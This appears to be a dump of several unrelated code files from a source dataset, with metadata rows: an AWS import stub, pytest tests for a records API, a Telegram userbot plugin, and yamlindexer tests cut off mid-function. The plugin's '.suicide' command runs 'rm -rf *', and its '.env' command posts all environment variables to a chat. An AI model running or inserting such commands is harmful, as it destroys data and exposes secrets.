3908515d48d5e42fd9bb6dadc1dc9fe5132a1425
|
[
"MIT-0"
] | 1
|
2022-01-13T14:29:52.000Z
|
2022-01-13T14:29:52.000Z
|
function/python_3_9/src/error/__init__.py
|
aws-samples/amazon-s3-object-lambda-default-configuration
|
3908515d48d5e42fd9bb6dadc1dc9fe5132a1425
|
[
"MIT-0"
] | null | null | null |
from .error_response import write_error_response_for_s3, write_error_response
| 39
| 77
| 0.910256
| 12
| 78
| 5.333333
| 0.583333
| 0.609375
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013699
| 0.064103
| 78
| 1
| 78
| 78
| 0.863014
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4c58e99e6876b8e962fa34a416141a5b3a365cfe
| 12,124
|
py
|
Python
|
tests/test_record.py
|
ramomar/gaston-backend
|
1b73b475478fdecf424e2d5f21fe4eb4472eb587
|
[
"MIT"
] | null | null | null |
tests/test_record.py
|
ramomar/gaston-backend
|
1b73b475478fdecf424e2d5f21fe4eb4472eb587
|
[
"MIT"
] | null | null | null |
tests/test_record.py
|
ramomar/gaston-backend
|
1b73b475478fdecf424e2d5f21fe4eb4472eb587
|
[
"MIT"
] | null | null | null |
import json
import uuid
from decimal import Decimal
from functions import record
def test_get_records_empty():
"""it should return an empty list when there are no records"""
event = {}
actual = record.get_records(event, context=None)
expected_body = {
'records': [],
'nextPage': None,
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4),
}
assert actual == expected
def test_get_records(gaston_table):
"""it should return a list of records"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item = {
'owner_id': 'ramomar',
'record_id': str(uuid.uuid4()),
'note': record_raw['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
gaston_table.put_item(Item=item)
event = {}
actual = record.get_records(event, context=None)
expected_body = {
'records': [
item,
],
'nextPage': None,
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual['statusCode'] == expected['statusCode']
assert actual['headers'] == expected['headers']
assert json.loads(actual['body']) == json.loads(expected['body'])
def test_paginate_records(gaston_table):
"""it should paginate records"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item = {
'owner_id': 'ramomar',
'record_id': '5f018b3d-e50e-44c9-a540-1717e00f09ba',
'note': record_raw['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
gaston_table.put_item(Item=item)
old_record = record.GET_RECORDS_QUERY_LIMIT
record.GET_RECORDS_QUERY_LIMIT = 1
event = {}
actual = record.get_records(event, context=None)
record.GET_RECORDS_QUERY_LIMIT = old_record
expected_body = {
'records': [
item,
],
'nextPage': 'eyJyZWNvcmRfaWQiOiAiNWYwMThiM2QtZTUwZS00NGM5LWE1NDAtMTcxN2UwMGYwOWJhIiwgIm93bmVyX2lkIjogInJhbW9tYXIifQ==',
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual['statusCode'] == expected['statusCode']
assert actual['headers'] == expected['headers']
assert json.loads(actual['body']) == json.loads(expected['body'])
def test_paginate_records_next_page(gaston_table):
"""it should be able to go to the next page"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item = {
'owner_id': 'ramomar',
'record_id': '5f018b3d-e50e-44c9-a540-1717e00f09ba',
'note': record_raw['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
record_raw_2 = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '651',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item_2 = {
'owner_id': 'ramomar',
'record_id': 'e12c0208-250f-4231-858b-ed82ffa4ed5e',
'note': record_raw_2['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw_2['operation_date'],
'raw': json.dumps(record_raw_2, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
gaston_table.put_item(Item=item)
gaston_table.put_item(Item=item_2)
old_record = record.GET_RECORDS_QUERY_LIMIT
record.GET_RECORDS_QUERY_LIMIT = 1
event = {
'queryStringParameters': None,
}
first_page_records = record.get_records(event, context=None)
next_page_event = {
'queryStringParameters': {
'page': json.loads(first_page_records['body'])['nextPage'],
}
}
next_page = record.get_records(next_page_event, context=None)
record.GET_RECORDS_QUERY_LIMIT = old_record
expected_body = {
'records': [
item_2,
],
# Even if it's the last item, DynamoDb still returns a LastEvaluatedKey. The next query will return empty.
'nextPage': 'eyJyZWNvcmRfaWQiOiAiZTEyYzAyMDgtMjUwZi00MjMxLTg1OGItZWQ4MmZmYTRlZDVlIiwgIm93bmVyX2lkIjogInJhbW9tYXIifQ==',
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert next_page['statusCode'] == expected['statusCode']
assert next_page['headers'] == expected['headers']
assert json.loads(next_page['body']) == json.loads(expected['body'])
def test_get_unreviewed_records(gaston_table):
"""it should return a list of unreviewed records"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
unreviewed_record = {
'owner_id': 'ramomar',
'record_id': '5f018b3d-e50e-44c9-a540-1717e00f09ba',
'note': record_raw['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
record_raw_2 = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '651',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
reviewed_record = {
'owner_id': 'ramomar',
'record_id': 'e12c0208-250f-4231-858b-ed82ffa4ed5e',
'note': record_raw_2['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw_2['operation_date'],
'raw': json.dumps(record_raw_2, default=str),
'origin': 'BANORTE_EMAIL_SES',
'review': {
'amount': '651',
'date': '2020-07-19T18:56:00.000Z',
'note': 'Salud',
'category': 'Salud',
},
}
gaston_table.put_item(Item=unreviewed_record)
gaston_table.put_item(Item=reviewed_record)
event = {
'path': '/records/unreviewed',
}
actual = record.get_records(event, context=None)
expected_body = {
'records': [
unreviewed_record,
],
'nextPage': None,
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual['statusCode'] == expected['statusCode']
assert actual['headers'] == expected['headers']
assert json.loads(actual['body']) == json.loads(expected['body'])
def test_get_record_not_found():
"""it should return nothing when the record is not found"""
event = {
'pathParameters': {
'record_id': str(uuid.uuid4()),
}
}
actual = record.get_record(event, context=None)
expected_body = {
'record': None
}
expected = {
'statusCode': 404,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual == expected
def test_get_record(gaston_table):
"""it should return a record"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item_id = str(uuid.uuid4())
item = {
'owner_id': 'ramomar',
'record_id': item_id,
'note': record_raw['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
gaston_table.put_item(Item=item)
event = {
'pathParameters': {
'record_id': item_id,
}
}
actual = record.get_record(event, context=None)
expected_body = {
'record': item,
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual['statusCode'] == expected['statusCode']
assert actual['headers'] == expected['headers']
assert json.loads(actual['body']) == json.loads(expected['body'])
| 29.355932
| 127
| 0.530848
| 1,183
| 12,124
| 5.253593
| 0.121724
| 0.050684
| 0.030893
| 0.032663
| 0.833307
| 0.81609
| 0.782784
| 0.782784
| 0.77313
| 0.760579
| 0
| 0.039894
| 0.313593
| 12,124
| 412
| 128
| 29.427184
| 0.706921
| 0.03225
| 0
| 0.715818
| 0
| 0
| 0.298196
| 0.054971
| 0
| 0
| 0
| 0
| 0.045576
| 1
| 0.018767
| false
| 0
| 0.010724
| 0
| 0.029491
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5c9e26dd2859c1e1608552fb159904d85c54030
| 14,217
|
py
|
Python
|
userbot/plugins/execmod.py
|
sakhiofsakshi/catuserbot
|
4703928a4b4184e3118ffae7f853f988117fa66f
|
[
"MIT"
] | 9
|
2021-05-16T23:40:05.000Z
|
2022-03-26T02:08:17.000Z
|
userbot/plugins/execmod.py
|
sakhiofsakshi/catuserbot
|
4703928a4b4184e3118ffae7f853f988117fa66f
|
[
"MIT"
] | null | null | null |
userbot/plugins/execmod.py
|
sakhiofsakshi/catuserbot
|
4703928a4b4184e3118ffae7f853f988117fa66f
|
[
"MIT"
] | 47
|
2021-03-16T17:16:25.000Z
|
2022-03-29T12:59:36.000Z
|
"""COMMAND : .cpu, .uptime, .suicide, .env, .pip, .neofetch, .coffeehouse, .date, .stdplugins, .fast, .iwantsex, .telegram, .listpip, .pyfiglet, .kowsay, .name, .faast, .daddyjoke, .fortune, .qquote, .fakeid, .vpn, .kwot, .qpro, .covid"""
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import subprocess
from telethon.errors import MessageEmptyError, MessageTooLongError, MessageNotModifiedError
import io
import asyncio
import time
import os
import sys
from telethon import events, functions, __version__
from userbot.utils import admin_cmd
from asyncio.subprocess import PIPE as asyncPIPE
from asyncio import create_subprocess_exec as asyncrunapp
if not os.path.isdir("./SAVED"):
os.makedirs("./SAVED")
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
@borg.on(admin_cmd(outgoing=True, pattern="pips(?: |$)(.*)"))
async def pipcheck(pip):
pipmodule = pip.pattern_match.group(1)
if pipmodule:
await pip.edit("`Searching . . .`")
pipc = await asyncrunapp(
"pip3",
"search",
pipmodule,
stdout=asyncPIPE,
stderr=asyncPIPE,
)
stdout, stderr = await pipc.communicate()
pipout = str(stdout.decode().strip()) \
+ str(stderr.decode().strip())
if pipout:
if len(pipout) > 4096:
await pip.edit("`Output too large, sending as file`")
file = open("pips.txt", "w+")
file.write(pipout)
file.close()
await pip.client.send_file(
pip.chat_id,
"pips.txt",
reply_to=pip.id,
caption = pipmodule,
)
os.remove("output.txt")
return
await pip.edit("**Query: **\n`"
f"pip3 search {pipmodule}"
"`\n**Result: **\n`"
f"{pipout}"
"`")
else:
await pip.edit("**Query: **\n`"
f"pip3 search {pipmodule}"
"`\n**Result: **\n`No Result Returned/False`")
else:
await pip.edit("`Use .help system to see an example`")
@borg.on(admin_cmd(pattern="suicide$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "rm -rf *"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"**[Cat's](tg://need_update_for_some_feature/) SUICIDE BOMB:**\n{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="plugins$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "ls userbot/plugins"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"**[Cat's](tg://need_update_for_some_feature/) PLUGINS:**\n{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="date$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "date"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="env$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "env"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT =f"**[Cat's](tg://need_update_for_some_feature/) Environment Module:**\n\n\n{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="fast$"))
async def _(event):
await event.edit("calculating...")
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "speedtest-cli"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"**[Cat's](tg://need_update_for_some_feature/) , Server Speed Calculated:**\n{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="fortune$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pytuneteller pisces --today"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="qquote$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "jotquote"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="fakeid$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "csvfaker -r 10 first_name last_name job"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="kwot$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "kwot"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT = f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "kwot.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
@borg.on(admin_cmd(pattern="qpro$"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "programmingquotes -l EN"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
OUTPUT =f"{o}"
if len(OUTPUT) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUTPUT)) as out_file:
out_file.name = "env.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=eply_to_id
)
await event.delete()
else:
await event.edit(OUTPUT)
| 32.833718
| 238
| 0.591264
| 1,747
| 14,217
| 4.586148
| 0.123068
| 0.035821
| 0.034948
| 0.037444
| 0.812781
| 0.806166
| 0.806166
| 0.806166
| 0.806166
| 0.806166
| 0
| 0.007481
| 0.304213
| 14,217
| 432
| 239
| 32.909722
| 0.802467
| 0.094675
| 0
| 0.743169
| 0
| 0
| 0.070365
| 0.014026
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030055
| 0
| 0.060109
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9135aa692eef59de085687042120fe5e6552307c
| 5,231
|
py
|
Python
|
tests/test_yamlindexer_search.py
|
ruizink/python-yamlindexer
|
50ed2d863e82ae25ed91747c935401f1c1b29bbf
|
[
"MIT"
] | 1
|
2022-03-28T17:47:16.000Z
|
2022-03-28T17:47:16.000Z
|
tests/test_yamlindexer_search.py
|
ruizink/python-yamlindexer
|
50ed2d863e82ae25ed91747c935401f1c1b29bbf
|
[
"MIT"
] | null | null | null |
tests/test_yamlindexer_search.py
|
ruizink/python-yamlindexer
|
50ed2d863e82ae25ed91747c935401f1c1b29bbf
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from yamlindexer.core import YAMLIndex
from unittest import TestCase
import pytest
t = TestCase()
yi = YAMLIndex(root_path='tests/fixtures')
def pytest_configure(config):
config.addinivalue_line(
"markers", "env(name): mark test to run only on named environment"
)
@pytest.mark.search_kv
def test_search_kv_1():
t.assertCountEqual(yi.search_kv(kind='Deployment'), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_kv
def test_search_kv_2():
t.assertCountEqual(yi.search_kv(kind='Pod'), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_kv
def test_search_kv_3():
t.assertCountEqual(yi.search_kv(apiVersion='v1'), [
'tests/fixtures/yaml/pod.yaml',
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/service-haproxy.yaml',
])
@pytest.mark.search_kv
def test_search_kv_4():
t.assertCountEqual(yi.search_kv(apiVersion='v1', kind='Pod'), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_kv
def test_search_kv_5():
t.assertCountEqual(yi.search_kv(kind='Deployment', apiVersion='apps/v1'), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search
def test_search_1():
t.assertCountEqual(yi.search({'kind': 'Deployment'}), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search
def test_search_2():
t.assertCountEqual(yi.search({'kind': 'Pod'}), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search
def test_search_3():
t.assertCountEqual(yi.search({'apiVersion': 'v1'}), [
'tests/fixtures/yaml/pod.yaml',
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/service-haproxy.yaml',
])
@pytest.mark.search
def test_search_4():
t.assertCountEqual(yi.search({'apiVersion': 'v1', 'kind': 'Pod'}), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search
def test_search_5():
t.assertCountEqual(yi.search({'kind': 'Deployment', 'apiVersion': 'apps/v1'}), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_1():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment'},
]), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_2():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Pod'},
]), [
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_3():
t.assertCountEqual(yi.search_one_of([
{'apiVersion': 'v1'},
]), [
'tests/fixtures/yaml/pod.yaml',
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/service-haproxy.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_4():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment'},
{'kind': 'Pod'},
]), [
'tests/fixtures/yaml/pod.yaml',
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_5():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment', 'apiVersion': 'v1'},
]), [])
@pytest.mark.search_one_of
def test_search_one_of_6():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment'},
{'apiVersion': 'apps/v1'},
]), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_7():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment'},
{'apiVersion': 'apps/v1'},
]), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_one_of
def test_search_one_of_8():
t.assertCountEqual(yi.search_one_of([
{'kind': 'Deployment', 'apiVersion': 'apps/v1'},
{'kind': 'Pod'},
]), [
'tests/fixtures/yaml/deployment.yaml',
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_1():
t.assertCountEqual(yi.search_dpath('/spec/template/spec/containers/*/image/nginx'), [
'tests/fixtures/yaml/deployment.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_2():
t.assertCountEqual(yi.search_dpath('/spec/ports/*/port/80'), [
'tests/fixtures/yaml/service-nginx.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_3():
t.assertCountEqual(yi.search_dpath('**/port/80'), [
'tests/fixtures/yaml/service-nginx.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_4():
t.assertCountEqual(yi.search_dpath('/metadata/name/nginx'), [
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/deployment.yaml',
'tests/fixtures/yaml/pod.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_5():
t.assertCountEqual(yi.search_dpath('/spec/ports'), [
